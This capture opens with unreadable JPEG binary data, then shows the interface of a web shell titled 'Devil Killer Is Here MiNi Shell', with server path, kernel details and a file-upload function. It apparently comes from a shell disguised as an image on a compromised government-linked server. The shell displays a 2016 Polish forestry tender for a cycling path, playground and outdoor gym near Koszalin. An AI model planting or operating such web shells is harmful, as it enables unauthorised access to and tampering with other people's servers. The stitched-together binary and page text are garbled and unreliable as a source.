JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160520/128276-N-2016.html

<p class="kh_header"><b>Sianów: Budowa infrastruktury turystycznej wokół Miasta Koszalina - II etap.
Przebudowa drogi leśnej gruntowej na ścieżkę dydaktyczną pieszo-rowerową Słupska w leśnictwie Koszalin wraz z montażem elementów gotowych małej architektury.
Nr sprawy: SA.270.3.4.2016.</b><br>
<b>Numer ogłoszenia: 128276 - 2016; data zamieszczenia: 20.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Karnieszewice , Trawica 8A, 76-004 Sianów, tel. 094 3185227, 3185228.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jedn.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa infrastruktury turystycznej wokół Miasta Koszalina - II etap.
Przebudowa drogi leśnej gruntowej na ścieżkę dydaktyczną pieszo-rowerową Słupska w leśnictwie Koszalin wraz z montażem elementów gotowych małej architektury.
Nr sprawy: SA.270.3.4.2016..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane (drogowe i obiekty rekreacyjne):
Przebudowa drogi leśnej gruntowej na ścieżkę dydaktyczną pieszo-rowerową SŁUPSKA w leśnictwie Koszalin wraz z montażem elementów gotowych małej architektury (w ramach zadania: Budowa infrastruktury turystycznej wokół Miasta Koszalin). a także wykonanie usług innych czynności, niezbędnych do wykonania robót budowlanych.
Opis przedmiotu zamówienia (opis techniczny):
budowa dydaktycznej ścieżki pieszo-rowerowej stanowiącej urządzenie turystyczne łączące ulicę Słupską i ulicę Leśną w Koszalinie i montaż urządzeń turystycznych w postaci gotowych elementów małej architektury w ramach zadania Budowa ścieżki dydaktycznej pieszo - rowerowej SŁUPSKA w leśnictwie Koszalin, w obrębie ewidencyjnym 32 m. Koszalin (działki nr 324/5, 324/4, 324/3) o długości całkowitej 0,539 km (Budowa infrastruktury turystycznej wokół miasta Koszalina - II etap.)
1. Przedmiot inwestycji
Projekt obejmuje wykonanie ścieżki dydaktycznej pieszo-rowerowej w leśnictwie Koszalin, po śladzie istniejącej drogi leśnej wraz z wyznaczeniem miejsc ustawienia elementów gotowych małej architektury. Ścieżka wytyczona zostanie 
w lesie, szacowana długość ścieżki: około 630 m i szerokości 2,50 m. Ścieżka stanowi połączenie miejskich dróg rowerowych.
2. Opis stanu istniejącego
W stanie istniejącym w miejscu projektowanej ścieżki znajduje się droga leśna gruntowa. Ze względu na konstrukcję ścieżki (gruntowa) i odwodnienie na teren, nie zmienia się wykorzystania tego terenu. Stosunki gruntowo - wodne pozostają niezmienione.
3. Projektowane zagospodarowanie działki lub terenu
Projekt obejmuje wykonanie drogi - ścieżki dydaktycznej pieszo-rowerowej długości 626,12 m i szerokości 2,50 m (przedmiotem zamówienia jest odcinek 
o długości 539 m, na działkach nadleśnictwa) wraz z wyznaczeniem miejsc ustawienia elementów gotowych małej architektury. Ścieżka została zaprojektowana jako gruntowa, o nawierzchni z kruszywa łamanego stabilizowanego mechanicznie 
w obramowaniu z obrzeży betonowych.
Droga została zaprojektowana po  terenie, z niewielkim wyniesieniem rzędu 5-15 cm. 
Zaprojektowano 2  miejsca  umożliwiające aktywne korzystanie z lasu.
Na odcinkach włączenia do istniejącego układu miejskiego zaprojektowano powierzchnie z betonowej kostki brukowej. Od strony ul. Leśnej zaprojektowano podłączenie w formie zjazdu zlokalizowanego na terenie miejskim. Zjazd z betonowej kostki brukowej zlokalizowano w miejscu istniejącej drogi gruntowej. 
1. Plac zabaw dla dzieci wyposażony w następujące elementy gotowe:
-Tablica do rysowania dwustronna - 1 szt.
-Most linowo - łańcuchowy - 1 szt.
-Belka balansująca - 1 szt.
-Czworobok sprawnościowy - 1 szt.
-Pochylnia - 1 szt.
-Szczudła Slalom - 1 szt.
-Ławka z oparciem -2 szt
-Kosz drewniany - 2 szt
-Tablica informacyjna - 1 szt.
Wokół poszczególnych elementów placu zabaw należy zapewnić strefy bezpieczeństwa szerokości 1,8 m wolne od wszelkiego rodzaju przeszkód terenowych (karcze, kamienie itp.). Strefy ochronne przedstawiono na rysunku. Obszar placu zabaw obramowany balami drewnianymi  wysokości 10-30cm
Elementy gotowe mają posiadać Certyfikat Bezpieczeństwa wydany przez Państwową Jednostkę Urząd Dozoru Technicznego, gwarantującego zgodność urządzeń zabawowych z normą bezpieczeństwa PN-EN 1176-1:2009 Wyposażenie placów zabaw i nawierzchnie.
2.Siłownia terenowa wyposażona w następujące elementy gotowe:
1.Twister obrotowy wraz z wahadłem	- 1 szt.
2.Biegacz					- 1 szt.
3.Orbitrek   				        - 1 szt.
4.Zestaw: Drabinka z pylonem i podciągiem do nóg  - 1 szt.
5.Pylon   					- 1 szt.
6.Tablica informacyjna  			- 1 szt.
7.Ławka z oparciem 			- 2 szt.
8.Kosz drewniany 			        - 2 szt.
Wykonanie, materiały urządzeń treningowych (siłowni):
- stal cynkowana malowana proszkowo lub stal nierdzewna,
- podstawowe kolory urządzeń standardowe (szary i zielony lub brązowy i zielony).
Urządzenia treningowe modułowe do ćwiczeń, przeznaczone do instalacji 
i użytkowania na dworze (na zewnątrz). 
Urządzenia modułowe pozwalające na dowolną konfigurację dwóch urządzeń po obu stronach jednego słupa nośnego. 
Pylon - nogi i główna konstrukcja nośna wykonana z dwóch stalowych rur o przekroju 
 90 mm, grubość 3,6 mm. Między nogami znajdują się dwie blachy grubości 7 mm do mocowania urządzeń po obu stronach. Między nogami znajdują się blachy grubości 2 mm na których znajduje się czytelna instrukcja obsługi urządzenia i dane producenta. 
Urządzenia - konstrukcja nośna wykonana ze stalowych rur o przekroju 90 mm 
i grubości 3,6 mm.
Uchwyty i pozostałe elementy rurowe wykonane ze stalowych rur O 40 mm, grubość 2 mm. Rury zakończone plastikowymi zatyczkami. 
Siedziska, i pedały wykonane ze stalowej blachy grubości 2 mm z otworami. Siedziska, pedały i oparcia mogą być wykonane ze stali kwasoodpornej (nierdzewnej).
Gumowe części amortyzujące (odbojniki) przykręcane za pomocą śruby z gwintem metrycznym do ramy urządzenia. Śruby metryczne ocynkowane. Nakrętki kołpakowe ocynkowane zabezpieczonymi przed odkręceniem. W przegubach łożyska kulkowe, bezobsługowe, metryczne. 
W urządzeniach, w których następuje uderzenie elementu w odbojnik na skutek wagi ćwiczącego, zastosowane są sprężyny gazowe zwalniające (amortyzatory). 
Malowanie proszkowe z podkładem cynkowym zapewniające ochronę antykorozyjną. 
Instalacja do fundamentów betonowych minimum 30 cm pod powierzchnią gruntu. Siedziska, pedały i oparcia mogą być wykonane ze stali kwasoodpornej (nierdzewnej).
Urządzenia będą wykonane w oparciu o normy PN-EN 1176-1:2009 potwierdzone aktualnym świadectwem lub certyfikatem. Urządzenia są przeznaczone i bezpieczne dla dzieci, dorosłych i seniorów w podeszłym wieku. Dopuszczalna waga ćwiczącego to 120 kg.
Wokół poszczególnych elementów siłowni terenowej należy zapewnić strefy bezpieczeństwa szerokości od 1,5 m do 1,8 m wolne od wszelkiego rodzaju przeszkód terenowych (karcze, kamienie itp.). Strefy ochronne przedstawiono na rysunku.
Elementy gotowe mają posiadać Certyfikat Bezpieczeństwa wydany przez Państwową Jednostkę Urząd Dozoru Technicznego, gwarantującego zgodność urządzeń z normą bezpieczeństwa PN-EN 1176-1:2009 Wyposażenie placów zabaw    i nawierzchnie.
4. Projektowane konstrukcje
Konstrukcja ścieżki:
- 10 cm kruszywo stabilizowane mechanicznie (łamane) C50/30
- 20 cm piasek
Obramowanie ścieżki z obrzeży betonowych 30x8 posadowionych na ławie betonowej 0.04 m3/mb
Konstrukcja nawierzchni z betonowej kostki brukowej
- 8 cm betonowa kostka brukowa
- 3 cm podsypka cem-piask 1:4
- 15 cm kruszywo stabilizowane mechanicznie (łamane) C50/30
- 10 cm piasek
Obramowanie nawierzchni brukowane krawężnikami betonowymi 15x30 posadowionych na ławie betonowej 0.076 m3/mb
Konstrukcja pod plac zabaw dla dzieci.
- 30 cm piasek
Konstrukcja pod siłownię terenową.
- istniejące podłoże, wypoziomowane w obrębie urządzenia
- 30 cm piasek
Posadowienie konstrukcji
Konstrukcje należy posadowić zgodnie z zaleceniami producenta. Konstrukcje powinny być zakotwione do fundamentów betonowych umieszczonych na głębokości minimum 0.30m pod powierzchnią gruntu. Spód fundamentu powinien znajdować się na głębokości minimum 0,64m od głębokości przemarzania (0.8m) należy pod fundamentem wymienić grunt na niewysadzinowy (piasek). 
Wykonawca winien wykonać roboty budowlane i przekazać Zamawiającemu dokumentację powykonawczą w sposób umożliwiający Inwestorowi złożenie zawiadomienia właściwego organu nadzoru budowlanego o zakończeniu budowy.
Wartość zamówienia nie przekracza kwoty określonej w art. 11 ust. 8 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity z 28 maja 2013 r. Dz. U. z 2013 r., poz. 907) z późniejszymi zmianami..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>1. Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających,
o których mowa w art. 67 ust. 1 pkt 6. Zamówienia uzupełniające dotyczą powtórzenia robót objętych zamówieniem podstawowym tego samego rodzaju zamówień 
o wartości do 50% zamówienia podstawowego (Przebudowa drogi leśnej gruntowej na ścieżkę dydaktyczną pieszo-rowerową SŁUPSKA w leśnictwie Koszalin wraz 
z montażem elementów gotowych małej architektury, w ramach zadania: Budowa infrastruktury turystycznej wokół Miasta Koszalin). 
2. Zamawiający przewiduje możliwość udzielenia zamówień dodatkowych, jeśli spełnione zostaną przesłanki udzielenia takiego zamówienia, określone w art. 67 ust.1 pkt 5 ustawy Pzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.62-2, 45.23.31.20-6, 45.23.31.40-2, 45.21.21.40-9, 45.11.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 5.500,00 złotych (słownie: pięć tysięcy pięćset i 00/100 złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu dotyczących posiadania uprawnień do wykonywania określonej działalności. Wykonawca w tym zakresie złoży oświadczenie o spełnieniu warunków udziału           w postępowaniu. 
- Ocena nastąpi według formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże że w okresie ostatnich 5 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej trzy zamówienia (zadania) polegające na budowie lub przebudowie dróg o nawierzchni      z kruszywa i kostki betonowej  o wartości każdego zamówienia (zadania) co najmniej 100.000,00 zł netto (słownie: sto tysięcy 00/100 złotych).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia ten warunek, jeżeli wykaże, że na czas realizacji zamówienia będzie dysponował sprzętem mechanicznym: samochód samowyładowczy (min. 1 szt.) o ładowności powyżej 5,0 ton (wskazane około 12 ton), koparko-ładowarką lub koparką (min. 1 szt.), równiarką drogową samojezdną (min. 1 szt.) lub/i spycharką (min. 1 szt.) oraz walcem drogowym (min. 1 szt.); 
- Ocena nastąpi według formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia ten warunek, jeżeli wykaże, że na czas realizacji zamówienia będzie dysponował osobą posiadającą uprawnienia do kierowania robotami budowlanymi drogowymi, aktualny wpis do właściwej izby inżynierskiej i ubezpieczenie odpowiedzialności cywilnej    
Wykonawca w tym zakresie złoży oświadczenie o spełnieniu warunków udziału           w postępowaniu oraz wykaz osób odpowiedzialnych za kierowanie robotami.
- Ocena nastąpi według formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia ten warunek, jeżeli:
- wykaże posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem niniejszego zamówienia (roboty budowlane - drogowe), przy czym kwota tego ubezpieczenia nie może być mniejsza niż 300.000,00 złotych
- Ocena nastąpi według formuły spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin wykonania badanej oferty (w pełnych tygodniach) do 10 tygodni od zawarcia umowy (nie później jednak jak na dzień 31 sierpnia 2016 r.) - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w następujących zakresach:
1. Zamawiający przewiduje możliwość zmiany ceny ofertowej:
a) w przypadku ustawowej zmiany stawki podatku VAT w czasie realizacji zamówienia, o wielkość tej stawki,
b) w przypadku rezygnacji z części zamówienia wynikającej z zaistnienia okoliczności powodującej, że wykonanie jej nie leży w interesie publicznym,
2. Zamawiający przewiduje możliwość zmiany terminu wykonania zamówienia:
a) przypadku udzielenia Wykonawcy zamówienia dodatkowego lub uzupełniającego w oparciu o art. 67 ust. 1 ustawy PZP, jeśli jego wykonanie (sposób, technologia) będzie skutkowało wydłużeniem terminu wykonania zamówienia podstawowego; 
b) w przypadku wstrzymania robót budowlanych w wyniku działania siły wyższej, potwierdzonego wpisem do dziennika budowy przez inspektora nadzoru, o ile czas wstrzymania robót i ich zakres będzie skutkować wydłużeniem terminu wykonania zamówienia
c) jeżeli w czasie obowiązywania umowy wystąpią wybitnie niesprzyjające warunki pogodowe uniemożliwiające realizację zadania np.: długotrwałe opady atmosferyczne, 
d) przypadku zaistnienia okoliczności niezależnych od Wykonawcy                   a w szczególności w przypadku istotnych błędów w dokumentacji projektowej, kolizji z niezinwentaryzowanymi sieciami podziemnymi, konieczności prowadzenia prac wykopaliskowych itp.
3. W przypadku powyższych okoliczności może nastąpić zmiana terminu zakończenia robót lub wynagrodzenia należnego Wykonawcy. 
4. Nowy termin wykonania zamówienia ustali Zamawiający po negocjacjach     z Wykonawcą.
5. Zamawiający w razie wstrzymania robót z przyczyn, za które wykonawca nie odpowiada, obowiązany jest do:
a) dokonania odbioru robót przerwanych oraz do zapłaty wynagrodzenia za roboty, które zostały wykonane do dnia odstąpienia,
b) przejęcie od Wykonawcy terenu budowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_szczecinek/nadl_karnieszewice/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Skarb Państwa Lasy Państwowe
Nadleśnictwo Karnieszewice
Trawica 8a
76-004 Sianów.</p>
